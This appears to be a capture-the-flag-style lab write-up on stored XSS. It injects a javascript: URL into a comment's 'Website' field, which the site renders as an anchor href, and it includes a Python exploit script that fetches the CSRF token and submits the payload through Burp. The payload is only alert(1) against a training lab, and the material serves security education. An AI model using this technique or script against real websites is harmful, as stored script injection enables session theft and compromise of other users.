XSS Lab 8
Stored XSS into an anchor href attribute by injecting a javascript: URL
Stored XSS into anchor href attribute with double quotes HTML-encoded#
This lab contains a stored cross-site scripting (XSS) vulnerability in the comment functionality. The application reflects the “Website” input inside an anchor `<a href="...">` attribute and HTML-encodes double quotes, which blocks straightforward attribute-breaking payloads. By supplying a `javascript:` URL as the website value and using Burp Suite to intercept and replay the request, it is possible to store a JavaScript URL that executes when the comment author’s name (the anchor) is clicked. This demonstrates how XSS can still be achieved when quotes are encoded, by abusing the URL context of the `href` attribute.
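To see why encoding quotes alone does not help here, the minimal sketch below mimics the quote-encoding with Python's `html.escape`. It is illustrative only and does not touch the lab; the anchor markup is an assumption, not the lab's exact HTML. Because the `javascript:` payload contains no quotes, the encoding leaves it untouched and the resulting link still navigates to a JavaScript URL when clicked.

from html import escape

# Mimic the server-side behaviour: double quotes in the "Website" value are
# HTML-encoded before the value is placed inside the href attribute.
payload = 'javascript:alert(1)'
anchor = f'<a href="{escape(payload, quote=True)}">test</a>'  # illustrative markup
print(anchor)
# -> <a href="javascript:alert(1)">test</a>  (payload survives unchanged)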
How Exploit Works#
- The comment “Website” field is reflected inside an anchor `href` attribute on the post page.
- Double quotes are HTML-encoded, which prevents breaking out of the attribute, but `javascript:` URLs inside `href` still execute when the link is followed.
- Submit a benign value first (random alphanumeric) and observe it being reflected inside the anchor `href` via Burp Repeater.
- Replace the reflected value with `javascript:alert(1)` in the intercepted request and resend.
- Verify by right-clicking the author name and copying the URL, pasting it into the address bar, or simply clicking the name: the injected `javascript:` URL should trigger the alert. A scripted check is sketched after this list.
- This is stored XSS because the payload is saved with the comment and executes later whenever the anchor is used.
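As an alternative to clicking the link manually, the stored payload can be confirmed with a short script. This is a minimal sketch that assumes the comment was posted to the blog post with `postId=5` (as in the exploit below) and uses a placeholder lab URL; it simply fetches the post page and looks for a `javascript:` URL in any anchor's `href`.

import requests
from bs4 import BeautifulSoup

LAB_URL = "https://YOUR-LAB-ID.web-security-academy.net"  # placeholder lab URL

# Fetch the post page where the comment was stored (postId=5 is an assumption
# matching the exploit script) and inspect every anchor's href for the payload.
r = requests.get(LAB_URL + "/post?postId=5")
soup = BeautifulSoup(r.text, "html.parser")
hrefs = [a.get("href", "") for a in soup.find_all("a")]
if any(h.startswith("javascript:") for h in hrefs):
    print("[+] Stored javascript: URL found in an anchor href")
else:
    print("[-] Payload not found - the comment may not have been stored")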
Usage#
python3 exploit.py https://<your-lab-id>.web-security-academy.net
Exploit#
exploit.py
import requests, sys, urllib3
from bs4 import BeautifulSoup

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Route all traffic through the local Burp Suite proxy so requests can be
# inspected and replayed in Repeater.
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}

def check_burp():
    try:
        requests.get("http://127.0.0.1:8080", proxies=proxies, timeout=3, verify=False)
    except requests.exceptions.RequestException:
        print("[-] Burp Suite not running.")
        sys.exit(1)

def exploit_xss(url, payload):
    s = requests.Session()
    s.proxies, s.verify = proxies, False

    # Fetch the blog post page and extract the CSRF token from the comment form.
    post_page = url.rstrip("/") + "/post?postId=5"
    r = s.get(post_page)
    r.raise_for_status()
    soup = BeautifulSoup(r.text, "html.parser")
    csrf = soup.find("input", {"name": "csrf"})["value"]

    # Submit a comment with the javascript: URL in the "Website" field.
    data = {
        "csrf": csrf,
        "postId": "5",
        "comment": "xss",
        "name": "test",
        "email": "[email protected]",
        "website": payload
    }
    r = s.post(url.rstrip("/") + "/post/comment", data=data)
    r.raise_for_status()

    # The lab home page shows a "Congratulations" banner once the lab is solved.
    if "Congratulations" in s.get(url).text:
        print("[+] Lab solved! 🎉")
        return True
    return False

def main():
    if len(sys.argv) != 2:
        print(f"Usage: python {sys.argv[0]} <url>")
        sys.exit(1)
    check_burp()
    print("[*] Attempting XSS...")
    if exploit_xss(sys.argv[1], 'javascript:alert(1)'):
        print("[+] XSS successful!")
    else:
        print("[-] XSS unsuccessful.")

if __name__ == "__main__":
    main()
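The script deliberately sends every request through the local Burp proxy (127.0.0.1:8080) with TLS verification disabled so that Burp's self-signed certificate is accepted and the intercept-and-replay workflow described above remains available while it runs. Success is detected by re-fetching the lab home page and checking for the “Congratulations” banner that appears once the lab is marked solved.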